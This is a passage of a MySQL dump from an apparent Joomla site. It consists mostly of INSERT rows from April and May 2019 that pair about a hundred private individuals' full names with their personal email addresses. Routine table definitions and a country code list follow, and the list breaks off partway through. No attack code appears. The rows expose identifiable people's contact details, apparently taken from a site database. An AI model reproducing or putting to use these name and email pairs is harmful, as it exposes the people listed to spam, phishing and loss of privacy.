(697, '2019-04-19 16:18:23', '0000-00-00 00:00:00', 1, 1, '863b661787591b2d', 0, '{\"email\":\"sceawen@yahoo.com\",\"name\":\"oluwaseun ebenezer\"}', 1),
(698, '2019-04-19 16:36:28', '0000-00-00 00:00:00', 1, 1, '706a9e7b9b736be5', 0, '{\"email\":\"felixfakiyesi@gmail.com\",\"name\":\"Fakiyesi \"}', 1),
(699, '2019-04-19 16:47:00', '0000-00-00 00:00:00', 1, 1, '2d2764c0886a8dd7', 0, '{\"email\":\"revfemiogundare@gmail.com\",\"name\":\"Evang. Femi Ogundare\"}', 1),
(700, '2019-04-19 17:50:18', '0000-00-00 00:00:00', 1, 1, 'bd11923b68f239af', 0, '{\"email\":\"victidara@yahoo.com\",\"name\":\"Tidara\"}', 1),
(701, '2019-04-19 18:35:39', '0000-00-00 00:00:00', 1, 1, '781d28e27974f180', 0, '{\"email\":\"bankikoko10@gmail.com\",\"name\":\"Bankole\"}', 1),
(702, '2019-04-19 20:10:30', '0000-00-00 00:00:00', 1, 1, '745751712b339964', 0, '{\"email\":\"seyishade2011@gmail.com\",\"name\":\"Samuel Oluwaseyi\"}', 1),
(703, '2019-04-20 08:45:22', '0000-00-00 00:00:00', 1, 1, '0a89162498b4a9f3', 0, '{\"email\":\"olayemigbad315@gmail.com\",\"name\":\"Yemi\"}', 1),
(704, '2019-04-20 11:38:55', '0000-00-00 00:00:00', 1, 1, '63965bb3f816f15c', 0, '{\"email\":\"judyirabor@yahoo.com\",\"name\":\"Judith Irhabor \"}', 1),
(705, '2019-04-20 13:00:05', '0000-00-00 00:00:00', 1, 1, '01d4f555dc6d8166', 0, '{\"email\":\"aifeyale@gmail.com\",\"name\":\"ADEKOYEJO IFEYALE\"}', 1),
(706, '2019-04-20 13:17:15', '0000-00-00 00:00:00', 1, 1, 'ccf4352b11f5e569', 0, '{\"email\":\"adebanre@hotmail.com\",\"name\":\"Adebanre  Olusanya\"}', 1),
(707, '2019-04-20 16:36:06', '0000-00-00 00:00:00', 1, 1, '59970aaeed13af41', 0, '{\"email\":\"chinenyeelizabeth2@gmail.com\",\"name\":\"chinenye\"}', 1),
(708, '2019-04-21 00:24:54', '0000-00-00 00:00:00', 1, 1, '88e290b24b01c6ba', 0, '{\"email\":\"bimbcharis@gmail.com\",\"name\":\"Ajibola Olaore\"}', 1),
(709, '2019-04-21 05:07:20', '0000-00-00 00:00:00', 1, 1, 'a2ba22d041888407', 0, '{\"email\":\"oyes@comcast.net\",\"name\":\"Pastor Oscar Smith \"}', 1),
(710, '2019-04-21 07:44:16', '0000-00-00 00:00:00', 1, 1, '097e17d44b4e9269', 0, '{\"email\":\"bicytobicyto@gmail\",\"name\":\"OLUFEMI SHOLAJA OLABISI \"}', 1),
(711, '2019-04-21 08:15:11', '0000-00-00 00:00:00', 1, 1, 'c2d26c31fdfcb2a0', 0, '{\"email\":\"aadetoun12@gmail.com\",\"name\":\"Adetoun Antonio-Ogoloma\"}', 1),
(712, '2019-04-21 08:57:05', '0000-00-00 00:00:00', 1, 1, '471c31909b29503b', 0, '{\"email\":\"olaniyifreemern001@gmail.com\",\"name\":\"Olaniyi\"}', 1),
(713, '2019-04-21 09:34:23', '0000-00-00 00:00:00', 1, 1, 'c1f06e9ee5610598', 0, '{\"email\":\"ttolomide@gmail.com\",\"name\":\"Betty Branch\"}', 1),
(714, '2019-04-21 10:05:21', '0000-00-00 00:00:00', 1, 1, 'ccf8406bb8bcd9c9', 0, '{\"email\":\"mikeagboola5@gmail.com\",\"name\":\"mike agboola\"}', 1),
(715, '2019-04-21 12:04:30', '0000-00-00 00:00:00', 1, 1, '56f2a0f7edade9d9', 0, '{\"email\":\"catherinefakiyesi@gmail.comr\",\"name\":\"Fakiyesi Folasade Catherine \"}', 1),
(716, '2019-04-21 12:42:11', '0000-00-00 00:00:00', 1, 1, 'd89980bc2ce590b3', 0, '{\"email\":\"ronkealabi6@gmail.com\",\"name\":\"Alabi Aderonke \"}', 1),
(717, '2019-04-21 19:43:01', '0000-00-00 00:00:00', 1, 1, 'bfd9fe0eae4c9f18', 0, '{\"email\":\"bevhudson@frontiernet.net\",\"name\":\"Beverly Hudson\"}', 1),
(718, '2019-04-22 15:54:55', '0000-00-00 00:00:00', 1, 1, '14b8324e3d456b69', 0, '{\"email\":\"abosede_segun@yahoo.ca\",\"name\":\"Temitope Segun\"}', 1),
(719, '2019-04-23 08:40:13', '0000-00-00 00:00:00', 1, 1, '1408c4207f805772', 0, '{\"email\":\"ayomiposijay@gmail.com\",\"name\":\"Marvellous Ajayi \"}', 1),
(720, '2019-04-23 09:39:09', '0000-00-00 00:00:00', 1, 1, '9bbbf0cc96b13eb1', 0, '{\"email\":\"revdgbengataiwo18@gmail.com\",\"name\":\"Revd Elijah Gbenga Taiwo\"}', 1),
(721, '2019-04-24 04:18:11', '0000-00-00 00:00:00', 1, 1, 'fd145ce0a3539bcd', 0, '{\"email\":\"seomo3659@gmail.com\",\"name\":\"oluwaseun\"}', 1),
(722, '2019-04-24 15:49:01', '0000-00-00 00:00:00', 1, 1, '7929cb5564459f7c', 0, '{\"email\":\"mauriceisong@gmail.com\",\"name\":\"Maurice Isong\"}', 1),
(723, '2019-04-24 17:12:12', '0000-00-00 00:00:00', 1, 1, '17b744f8c7e25fdb', 0, '{\"email\":\"dayosolomon005@gmail.com\",\"name\":\"Ige oladayo solomon\"}', 1),
(724, '2019-04-25 04:14:40', '0000-00-00 00:00:00', 1, 1, '46f523c499dccf70', 0, '{\"email\":\"fataiaolawal@gmail.com\",\"name\":\"Fatai Lawal\"}', 1),
(725, '2019-04-25 08:17:51', '0000-00-00 00:00:00', 1, 1, 'bf99891f96a63a7b', 0, '{\"email\":\"petersonnola@yahoo.co.uk\",\"name\":\"Afolabi, O. Peter\"}', 1),
(726, '2019-04-25 18:11:29', '0000-00-00 00:00:00', 1, 1, 'fe116df3e5dd3ed4', 0, '{\"email\":\"oni.obusola@gmail.com\",\"name\":\"Busola Adeojo\"}', 1),
(727, '2019-04-26 08:49:31', '0000-00-00 00:00:00', 1, 1, 'a335a6bf4c300227', 0, '{\"email\":\"olufemifakolade29@gmail.com\",\"name\":\"Olufemi Fakolade\"}', 1),
(728, '2019-04-26 09:04:54', '0000-00-00 00:00:00', 1, 1, '10d014f509b5ed30', 0, '{\"email\":\"leke_olusa@yaoo.co.uk\",\"name\":\"Gbemileke Olusa\"}', 1),
(729, '2019-04-26 13:22:46', '0000-00-00 00:00:00', 1, 1, 'f683b45bfcf13686', 0, '{\"email\":\"owoyelerufusb@gmail.com\",\"name\":\"Rev.A.O Rufus\"}', 1),
(730, '2019-04-26 23:43:03', '0000-00-00 00:00:00', 1, 1, 'c0ef079f8e9b3225', 0, '{\"email\":\"adekanmifrancistope@gmail.com\",\"name\":\"Francis Adekanmi\"}', 1),
(731, '2019-04-28 09:26:07', '0000-00-00 00:00:00', 1, 1, 'f4b0cdf890a27c29', 0, '{\"email\":\"samuelayandiran14@gmail.com\",\"name\":\"Samuel Ayandiran\"}', 1),
(732, '2019-04-28 14:41:12', '0000-00-00 00:00:00', 1, 1, '753c1b241632484c', 0, '{\"email\":\"unugwakagu@yahoo.com\",\"name\":\"Onobrakpeya Joy\"}', 1),
(733, '2019-04-28 21:13:57', '0000-00-00 00:00:00', 1, 1, 'b9d57b05008f3ee8', 0, '{\"email\":\"gloryosemudiamen@gmail.com\",\"name\":\"Okoh Glory\"}', 1),
(734, '2019-04-29 09:15:02', '0000-00-00 00:00:00', 1, 1, 'f99f423952aec752', 0, '{\"email\":\"paciseya@gmail.com\",\"name\":\"Regina Nnenna Eya\"}', 1),
(735, '2019-04-29 16:32:13', '0000-00-00 00:00:00', 1, 1, '5e3c73adcbd400f3', 0, '{\"email\":\"johnnexdee@gmail.com\",\"name\":\"John\"}', 1),
(736, '2019-04-30 05:41:35', '0000-00-00 00:00:00', 1, 1, '53a1ae48d88e94ca', 0, '{\"email\":\"Olawunmialukoo@gmail.com\",\"name\":\"Olawunmi Aluko Mrs \"}', 1),
(737, '2019-04-30 09:28:37', '0000-00-00 00:00:00', 1, 1, 'f99f423952aec752', 0, '{\"email\":\"paciseya@yahoo.com\",\"name\":\"Regina Nnenna Eya\"}', 1),
(738, '2019-04-30 11:32:45', '0000-00-00 00:00:00', 1, 1, 'c1549de677cc9453', 0, '{\"email\":\"ayoolakehinde96@gmail.com\",\"name\":\"Owojori Ayoola Kehinde\"}', 1),
(739, '2019-04-30 14:47:01', '0000-00-00 00:00:00', 1, 1, '56b08af584d59109', 0, '{\"email\":\"bixroy@gmail.com\",\"name\":\"Adejumo Ayodele\"}', 1),
(740, '2019-04-30 18:31:58', '0000-00-00 00:00:00', 1, 1, 'c965ee39bfe4df73', 0, '{\"email\":\"ebiesamuel@gmail.com\",\"name\":\"Samuel Ebie\"}', 1),
(741, '2019-04-30 22:25:26', '0000-00-00 00:00:00', 1, 1, 'b907b51ef241b910', 0, '{\"email\":\"kbolanle@gmail.com\",\"name\":\"Eunice \"}', 1),
(742, '2019-05-01 04:50:38', '0000-00-00 00:00:00', 1, 1, 'd423cd095405ed54', 0, '{\"email\":\"agloriousmat@gmail.com\",\"name\":\"Towolawi Adewale Moses \"}', 1),
(743, '2019-05-01 05:04:40', '0000-00-00 00:00:00', 1, 1, '5b256f4a57545070', 0, '{\"email\":\"gugu_anna@yahoo.com\",\"name\":\"Perpetua Gugu\"}', 1),
(744, '2019-05-01 05:05:38', '0000-00-00 00:00:00', 1, 1, '13efe1e88d729d12', 0, '{\"email\":\"enwelikufidelis@yahoo.com\",\"name\":\"AUGUSTINE FIDELIS ENWELIKU \"}', 1),
(745, '2019-05-01 05:44:37', '0000-00-00 00:00:00', 1, 1, '117edd9209c2b7b6', 0, '{\"email\":\"osloruf@yahoo.com\",\"name\":\"Osewa Mary Comfort\"}', 1),
(746, '2019-05-01 05:59:23', '0000-00-00 00:00:00', 1, 1, '117edd9209c2b7b6', 0, '{\"email\":\"osloruf@yahoo.com\",\"name\":\"Osewa Mary Comfort\"}', 1),
(747, '2019-05-01 13:14:46', '0000-00-00 00:00:00', 1, 1, 'aa51537be01ca0e7', 0, '{\"email\":\"mariebames01@gmail.com\",\"name\":\"Mary B. Okoromadu\"}', 1),
(748, '2019-05-02 01:03:22', '0000-00-00 00:00:00', 1, 1, 'ae36e744cddc217e', 0, '{\"email\":\"sannijohn224@gmail.com\",\"name\":\"Sanni John\"}', 1),
(749, '2019-05-02 04:35:46', '0000-00-00 00:00:00', 1, 1, '17b744f8c7e25fdb', 0, '{\"email\":\"dayosolomon005@gmail.com\",\"name\":\"Ige oladayo solomon\"}', 1),
(750, '2019-05-02 05:07:12', '0000-00-00 00:00:00', 1, 1, '9a427fdb345399a0', 0, '{\"email\":\"oluwakemisakako@gmail.com\",\"name\":\"Oyelowo oluwakemi\"}', 1),
(751, '2019-05-02 05:31:09', '0000-00-00 00:00:00', 1, 1, 'f82092c83a89017c', 0, '{\"email\":\"gloriaewoma@gmail.com\",\"name\":\"Asibebluo. Gloris\"}', 1),
(752, '2019-05-02 05:34:36', '0000-00-00 00:00:00', 1, 1, '6ea6bbe0c656d250', 0, '{\"email\":\"iwariyoungarney@gmail.com\",\"name\":\"Young Arney Iwari G \"}', 1),
(753, '2019-05-02 07:46:11', '0000-00-00 00:00:00', 1, 1, '92f1dea607448efe', 0, '{\"email\":\"adeddiran.adeniyi@gmail.com\",\"name\":\"Adeniyi Adediran\"}', 1),
(754, '2019-05-02 15:22:39', '0000-00-00 00:00:00', 1, 1, '20a548b6f2f15388', 0, '{\"email\":\"hunyinsodek@gmail.com\",\"name\":\"Hunyinsode Kehinde\"}', 1),
(755, '2019-05-02 19:13:19', '0000-00-00 00:00:00', 1, 1, 'c7ee01ed41c17b79', 0, '{\"email\":\"ojo.johnoluwatosin@gmail.com\",\"name\":\"John Oluwatosin Ojo \"}', 1),
(756, '2019-05-02 20:59:12', '0000-00-00 00:00:00', 1, 1, 'c47b92f50ec6629b', 0, '{\"email\":\"revdgbengataiwo18@gmail.coml\",\"name\":\"Elijah Gbenga Taiwo\"}', 1),
(757, '2019-05-03 04:34:17', '0000-00-00 00:00:00', 1, 1, 'f12c2c61072c9fbe', 0, '{\"email\":\"akewusholaomobolanle@gmail.com\",\"name\":\"Akeushola omobolanle\"}', 1),
(758, '2019-05-03 04:35:20', '0000-00-00 00:00:00', 1, 1, 'bdf4d5bd790a1039', 0, '{\"email\":\"princeotademola@gmail.com\",\"name\":\"OLUWAGBEMILEKE TAIWO ADEMOLA\"}', 1),
(759, '2019-05-03 05:06:22', '0000-00-00 00:00:00', 1, 1, '798b19a52dc93d69', 0, '{\"email\":\"ibitundeabayomi@gmail.com\",\"name\":\"Ibitunde Abayomi\"}', 1),
(760, '2019-05-03 05:21:06', '0000-00-00 00:00:00', 1, 1, '0db57dcaa4b20fd7', 0, '{\"email\":\"olayinksoni@gmail.com\",\"name\":\"Olayinka onigbogi\"}', 1),
(761, '2019-05-03 06:19:22', '0000-00-00 00:00:00', 1, 1, '066a94ba5b20ac52', 0, '{\"email\":\"olavicky91@gmail.com\",\"name\":\"Oteje Abidemi Victoria\"}', 1),
(762, '2019-05-03 07:47:24', '0000-00-00 00:00:00', 1, 1, '7ef671cabcedfb48', 0, '{\"email\":\"nwakasophia@gmail.com\",\"name\":\"Sophia Nwaka\"}', 1),
(763, '2019-05-03 16:04:12', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(764, '2019-05-03 16:10:08', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(765, '2019-05-03 16:11:11', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(766, '2019-05-03 16:12:06', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(767, '2019-05-03 16:12:39', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(768, '2019-05-03 16:23:49', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(769, '2019-05-03 16:24:08', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(770, '2019-05-03 16:32:45', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(771, '2019-05-03 16:41:55', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(772, '2019-05-03 17:05:26', '0000-00-00 00:00:00', 1, 1, '00488efbbc03a9f7', 0, '{\"email\":\"orumacecelia88@gmail.com\",\"name\":\"Oruma Cecilia oluwatosin\"}', 1),
(773, '2019-05-04 05:21:29', '0000-00-00 00:00:00', 1, 1, 'f32e9845009945fa', 0, '{\"email\":\"Fadeleemmanuel@mail.com\",\"name\":\"Emmanuel Fadele\"}', 1),
(774, '2019-05-04 05:22:46', '0000-00-00 00:00:00', 1, 1, 'f32e9845009945fa', 0, '{\"email\":\"Fadeleemmanuel@mail.com\",\"name\":\"Emmanuel Fadele\"}', 1),
(775, '2019-05-04 05:23:07', '0000-00-00 00:00:00', 1, 1, '066a94ba5b20ac52', 0, '{\"email\":\"olavicky91@gmail.com\",\"name\":\"Oteje Abidemi Victoria\"}', 1),
(776, '2019-05-04 16:34:36', '0000-00-00 00:00:00', 1, 1, '515726ffb2d64367', 0, '{\"email\":\"olubukolaa43@gmail.com\",\"name\":\"Odekunle Olubukola Abiodun\"}', 1),
(777, '2019-05-06 05:12:14', '0000-00-00 00:00:00', 1, 1, 'f08feb3c643cd6a2', 0, '{\"email\":\"olukoyatoluwa11@gmail.com\",\"name\":\"olukoya Tolulope\"}', 1),
(778, '2019-05-06 05:13:42', '0000-00-00 00:00:00', 1, 1, 'd6f95ce097dcbec4', 0, '{\"email\":\"revfemiogundare@gmail.com\",\"name\":\"OLUFEMI LOUIS OGUNDARE\"}', 1),
(779, '2019-05-06 05:17:59', '0000-00-00 00:00:00', 1, 1, 'd6f95ce097dcbec4', 0, '{\"email\":\"revfemiogundare@gmail.com\",\"name\":\"Rev LOUIS OLUFEMI OGUNDARE\"}', 1),
(780, '2019-05-06 05:34:30', '0000-00-00 00:00:00', 1, 1, '39d5d8b8a4e0efc4', 0, '{\"email\":\"ayodeleogundare@yahoo.com\",\"name\":\"Ayodele Ogundare\"}', 1),
(781, '2019-05-06 20:25:12', '0000-00-00 00:00:00', 1, 1, '9c7c4b924187ec45', 0, '{\"email\":\"kolawoleo787@gmail.com\",\"name\":\"Kolawole Opeoluwa\"}', 1),
(782, '2019-05-07 04:54:24', '0000-00-00 00:00:00', 1, 1, '39d5d8b8a4e0efc4', 0, '{\"email\":\"ayodeleogundare@yahoo.com\",\"name\":\"Ayodele Ogundare\"}', 1),
(783, '2019-05-07 05:13:35', '0000-00-00 00:00:00', 1, 1, '9a427fdb345399a0', 0, '{\"email\":\"oluwakemisakako@gmail.com\",\"name\":\"Oyelowo oluwakemi\"}', 1),
(784, '2019-05-07 05:35:54', '0000-00-00 00:00:00', 1, 1, 'be618f277215c1f0', 0, '{\"email\":\"sayo.ladejo@gmail.com\",\"name\":\"Olusayo Oladejo\"}', 1),
(785, '2019-05-07 05:36:36', '0000-00-00 00:00:00', 1, 1, 'be618f277215c1f0', 0, '{\"email\":\"sayo.ladejo@gmail.com\",\"name\":\"Olusayo Oladejo\"}', 1),
(786, '2019-05-07 07:22:28', '0000-00-00 00:00:00', 1, 1, '92c0a138d1c36fa3', 0, '{\"email\":\"Solomonsaliu969@gmail.com\",\"name\":\"Solomon Seun\"}', 1),
(787, '2019-05-08 00:45:32', '0000-00-00 00:00:00', 1, 1, '2d112dbc92f52184', 0, '{\"email\":\"wondersogundare@gmail.com\",\"name\":\"Wonders\"}', 1),
(788, '2019-05-08 05:06:00', '0000-00-00 00:00:00', 1, 1, 'be618f277215c1f0', 0, '{\"email\":\"sayo.ladejo@gmail.com\",\"name\":\"Olusayo Oladejo\"}', 1),
(789, '2019-05-08 05:15:21', '0000-00-00 00:00:00', 1, 1, 'f64e91c9385d2fc5', 0, '{\"email\":\"adeigaolanrewaju016@gmail.com\",\"name\":\"ADEIGA OLANREWAJU\"}', 1),
(790, '2019-05-08 05:16:48', '0000-00-00 00:00:00', 1, 1, '9a427fdb345399a0', 0, '{\"email\":\"oluwakemisakako@gmail.com\",\"name\":\"Oyelowo oluwakemi\"}', 1),
(791, '2019-05-08 06:40:34', '0000-00-00 00:00:00', 1, 1, 'a830f26704608b5b', 0, '{\"email\":\"abe.victor0075@gmail.com\",\"name\":\"Abidemi Folahan\"}', 1),
(792, '2019-05-08 06:41:10', '0000-00-00 00:00:00', 1, 1, '8dc3699379bdb146', 0, '{\"email\":\"laoyekemi001@gmail.com\",\"name\":\"Laoye Kemi O.\"}', 1),
(793, '2019-05-08 06:42:16', '0000-00-00 00:00:00', 1, 1, '8dc3699379bdb146', 0, '{\"email\":\"laoyekemi001@gmail.com\",\"name\":\"Laoye Kemi O.\"}', 1),
(794, '2019-05-08 09:11:15', '0000-00-00 00:00:00', 1, 1, '6692bc846e219492', 0, '{\"email\":\"st.petersbell120@gmail.com\",\"name\":\"St. PetersBell Jigo\"}', 1),
(795, '2019-05-09 05:04:52', '0000-00-00 00:00:00', 1, 1, '5e3c73adcbd400f3', 0, '{\"email\":\"johnnexdee@gmail.com\",\"name\":\"John\"}', 1),
(796, '2019-05-09 05:23:08', '0000-00-00 00:00:00', 1, 1, '9a427fdb345399a0', 0, '{\"email\":\"oluwakemisakako@gmail.com\",\"name\":\"Oyelowo oluwakemi\"}', 1),
(797, '2019-05-09 06:22:50', '0000-00-00 00:00:00', 1, 1, 'da9f15c81523a23b', 0, '{\"email\":\"Gokeplus@hotmail.com\",\"name\":\"Goke Adeolu\"}', 1),
(798, '2019-05-09 06:42:26', '0000-00-00 00:00:00', 1, 1, 'e72cad3be25802c2', 0, '{\"email\":\"ooakinruli@hotmail.com\",\"name\":\"Olayemi Oladapo-Akinruli\"}', 1),
(799, '2019-05-09 12:08:44', '0000-00-00 00:00:00', 1, 1, 'f71b74fba874df94', 0, '{\"email\":\"oluwafemi.ayoola@gmail.com\",\"name\":\"Oluwafemi Ayoola\"}', 1),
(800, '2019-05-09 13:29:27', '0000-00-00 00:00:00', 1, 1, '4b9fa86d479179b5', 0, '{\"email\":\"ksoyooye@gmail.com\",\"name\":\"Kunle\"}', 1),
(801, '2019-05-09 23:24:51', '0000-00-00 00:00:00', 1, 1, '045c22dbfe7f4715', 0, '{\"email\":\"toyeajadidth2014@yahoo.com\",\"name\":\"Isaac \"}', 1),
(802, '2019-05-10 05:31:53', '0000-00-00 00:00:00', 1, 1, '87f105a7568dfeff', 0, '{\"email\":\"olaoyeoyetolani@gmail.com\",\"name\":\"Tolani Fasehun\"}', 1),
(803, '2019-05-10 11:00:14', '0000-00-00 00:00:00', 1, 1, 'c0e3e2bcef9f0f00', 0, '{\"email\":\"delyem.2003@gmail.con\",\"name\":\"TaIabi Oladele Anthony\"}', 1),
(804, '2019-05-10 16:24:10', '0000-00-00 00:00:00', 1, 1, '34e38ad1bd2cc3de', 0, '{\"email\":\"peterlanlehin@gmail.com\",\"name\":\"Lanlehin Peter\"}', 1);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_corejoomla_assets`
--

CREATE TABLE `y57u5_corejoomla_assets` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(64) NOT NULL,
  `version` varchar(32) NOT NULL,
  `released` date NOT NULL DEFAULT '0000-00-00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_corejoomla_countries`
--

CREATE TABLE `y57u5_corejoomla_countries` (
  `id` int(10) UNSIGNED NOT NULL,
  `country_code` varchar(3) NOT NULL,
  `country_name` varchar(64) NOT NULL,
  `language` varchar(6) NOT NULL DEFAULT '*'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_corejoomla_countries`
--

INSERT INTO `y57u5_corejoomla_countries` (`id`, `country_code`, `country_name`, `language`) VALUES
(1, 'AF', 'Afghanistan', '*'),
(2, 'AX', 'Åland Islands', '*'),
(3, 'AL', 'Albania', '*'),
(4, 'DZ', 'Algeria', '*'),
(5, 'AS', 'American Samoa', '*'),
(6, 'AD', 'Andorra', '*'),
(7, 'AO', 'Angola', '*'),
(8, 'AI', 'Anguilla', '*'),
(9, 'AQ', 'Antarctica', '*'),
(10, 'AG', 'Antigua And Barbuda', '*'),
(11, 'AR', 'Argentina', '*'),
(12, 'AM', 'Armenia', '*'),
(13, 'AW', 'Aruba', '*'),
(14, 'AU', 'Australia', '*'),
(15, 'AT', 'Austria', '*'),
(16, 'AZ', 'Azerbaijan', '*'),
(17, 'BS', 'Bahamas', '*'),
(18, 'BH', 'Bahrain', '*'),
(19, 'BD', 'Bangladesh', '*'),
(20, 'BB', 'Barbados', '*'),
(21, 'BY', 'Belarus', '*'),
(22, 'BE', 'Belgium', '*'),
(23, 'BZ', 'Belize', '*'),
(24, 'BJ', 'Benin', '*'),
(25, 'BM', 'Bermuda', '*'),
(26, 'BT', 'Bhutan', '*'),
(27, 'BO', 'Bolivia', '*'),
(28, 'BA', 'Bosnia And Herzegovina', '*'),
(29, 'BW', 'Botswana', '*'),
(30, 'BV', 'Bouvet Island', '*'),
(31, 'BR', 'Brazil', '*'),
(32, 'IO', 'British Indian Ocean Territory', '*'),
(33, 'BN', 'Brunei Darussalam', '*'),
(34, 'BG', 'Bulgaria', '*'),
(35, 'BF', 'Burkina Faso', '*'),
(36, 'BI', 'Burundi', '*'),
(37, 'KH', 'Cambodia', '*'),
(38, 'CM', 'Cameroon', '*'),
(39, 'CA', 'Canada', '*'),
(40, 'CV', 'Cape Verde', '*'),
(41, 'KY', 'Cayman Islands', '*'),
(42, 'CF', 'Central African Republic', '*'),
(43, 'TD', 'Chad', '*'),
(44, 'CL', 'Chile', '*'),
(45, 'CN', 'China', '*'),
(46, 'CX', 'Christmas Island', '*'),
(47, 'CC', 'Cocos Keeling Islands', '*'),
(48, 'CO', 'Colombia', '*'),
(49, 'KM', 'Comoros', '*'),
(50, 'CG', 'Congo', '*'),
(51, 'CD', 'Congo', '*'),
(52, 'CK', 'Cook Islands', '*'),
(53, 'CR', 'Costa Rica', '*'),
(54, 'CI', 'Côte D\'ivoire', '*'),
(55, 'HR', 'Croatia', '*'),
(56, 'CU', 'Cuba', '*'),
(57, 'CY', 'Cyprus', '*'),
(58, 'CZ', 'Czech Republic', '*'),
(59, 'DK', 'Denmark', '*'),
(60, 'DJ', 'Djibouti', '*'),
(61, 'DM', 'Dominica', '*'),
(62, 'DO', 'Dominican Republic', '*'),
(63, 'EC', 'Ecuador', '*'),
(64, 'EG', 'Egypt', '*'),
(65, 'SV', 'El Salvador', '*'),
(66, 'GQ', 'Equatorial Guinea', '*'),
(67, 'ER', 'Eritrea', '*'),
(68, 'EE', 'Estonia', '*'),
(69, 'ET', 'Ethiopia', '*'),
(70, 'FK', 'Falkland Islands Malvinas', '*'),
(71, 'FO', 'Faroe Islands', '*'),
(72, 'FJ', 'Fiji', '*'),
(73, 'FI', 'Finland', '*'),
(74, 'FR', 'France', '*'),
(75, 'GF', 'French Guiana', '*'),
(76, 'PF', 'French Polynesia', '*'),
(77, 'TF', 'French Southern Territories', '*'),
(78, 'GA', 'Gabon', '*'),
(79, 'GM', 'Gambia', '*'),
(80, 'GE', 'Georgia', '*'),
(81, 'DE', 'Germany', '*'),
(82, 'GH', 'Ghana', '*'),
(83, 'GI', 'Gibraltar', '*'),
(84, 'GR', 'Greece', '*'),
(85, 'GL', 'Greenland', '*'),
(86, 'GD', 'Grenada', '*'),
(87, 'GP', 'Guadeloupe', '*'),
(88, 'GU', 'Guam', '*'),
(89, 'GT', 'Guatemala', '*'),
(90, 'GG', 'Guernsey', '*'),
(91, 'GN', 'Guinea', '*'),
(92, 'GW', 'Guinea-Bissau', '*'),
(93, 'GY', 'Guyana', '*'),
(94, 'HT', 'Haiti', '*'),
(95, 'HM', 'Heard Island And Mcdonald Islands', '*'),
(96, 'HN', 'Honduras', '*'),
(97, 'HK', 'Hong Kong', '*'),
(98, 'HU', 'Hungary', '*'),
(99, 'IS', 'Iceland', '*'),
(100, 'IN', 'India', '*'),
(101, 'ID', 'Indonesia', '*'),
(102, 'IR', 'Iran', '*'),
(103, 'IQ', 'Iraq', '*'),
(104, 'IE', 'Ireland', '*'),
(105, 'IM', 'Isle Of Man', '*'),
(106, 'IL', 'Israel', '*'),
(107, 'IT', 'Italy', '*'),
(108, 'JM', 'Jamaica', '*'),
(109, 'JP', 'Japan', '*'),
(110, 'JE', 'Jersey', '*'),
(111, 'JO', 'Jordan', '*'),
(112, 'KZ', 'Kazakhstan', '*'),
(113, 'KE', 'Kenya', '*'),
(114, 'KI', 'Kiribati', '*'),
(115, 'KP', 'Korea', '*'),
(116, 'KR', 'Korea', '*'),
(117, 'KW', 'Kuwait', '*'),
(118, 'KG', 'Kyrgyzstan', '*'),
(119, 'LA', 'Lao People\'s Democratic Republic', '*'),
(120, 'LV', 'Latvia', '*'),
(121, 'LB', 'Lebanon', '*'),
(122, 'LS', 'Lesotho', '*'),
(123, 'LR', 'Liberia', '*'),
(124, 'LY', 'Libyan Arab Jamahiriya', '*'),
(125, 'LI', 'Liechtenstein', '*'),
(126, 'LT', 'Lithuania', '*'),
(127, 'LU', 'Luxembourg', '*'),
(128, 'MO', 'Macao', '*'),
(129, 'MK', 'Macedonia', '*'),
(130, 'MG', 'Madagascar', '*'),
(131, 'MW', 'Malawi', '*'),
(132, 'MY', 'Malaysia', '*'),
(133, 'MV', 'Maldives', '*'),
(134, 'ML', 'Mali', '*'),
(135, 'MT', 'Malta', '*'),
(136, 'MH', 'Marshall Islands', '*'),
(137, 'MQ', 'Martinique', '*'),
(138, 'MR', 'Mauritania', '*'),
(139, 'MU', 'Mauritius', '*'),
(140, 'YT', 'Mayotte', '*'),
(141, 'MX', 'Mexico', '*'),
(142, 'FM', 'Micronesia', '*'),
(143, 'MD', 'Moldova', '*'),
(144, 'MC', 'Monaco', '*'),
(145, 'MN', 'Mongolia', '*'),
(146, 'ME', 'Montenegro', '*'),
(147, 'MS', 'Montserrat', '*'),
(148, 'MA', 'Morocco', '*'),
(149, 'MZ', 'Mozambique', '*'),
(150, 'MM', 'Myanmar', '*'),
(151, 'NA', 'Namibia', '*'),
(152, 'NR', 'Nauru', '*'),
(153, 'NP', 'Nepal', '*'),
(154, 'NL', 'Netherlands', '*'),
(155, 'AN', 'Netherlands Antilles', '*'),
(156, 'NC', 'New Caledonia', '*'),
(157, 'NZ', 'New Zealand', '*'),
(158, 'NI', 'Nicaragua', '*'),
(159, 'NE', 'Niger', '*'),
(160, 'NG', 'Nigeria', '*'),
(161, 'NU', 'Niue', '*'),
(162, 'NF', 'Norfolk Island', '*'),
